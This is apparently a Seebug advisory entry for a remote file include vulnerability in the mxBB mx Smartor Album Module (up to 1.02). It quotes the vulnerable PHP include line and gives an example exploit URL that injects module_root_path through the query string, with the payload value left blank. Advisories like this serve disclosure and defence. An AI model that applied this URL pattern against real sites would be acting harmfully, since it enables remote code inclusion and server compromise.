mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability

ID SSV:5483
Type seebug
Reporter Root
Modified 2006-11-06T00:00:00


No description provided by source.

                                                MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}
Vulnerable Code:
    if ( $mode == 'album_cat' )
       include($module_root_path. 'includes/album_cat.'.$phpEx);
    (the rest of the vulnerable code removed for brevity)
Vulnerability: $module_root_path is uninitialized
Source Code:
Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=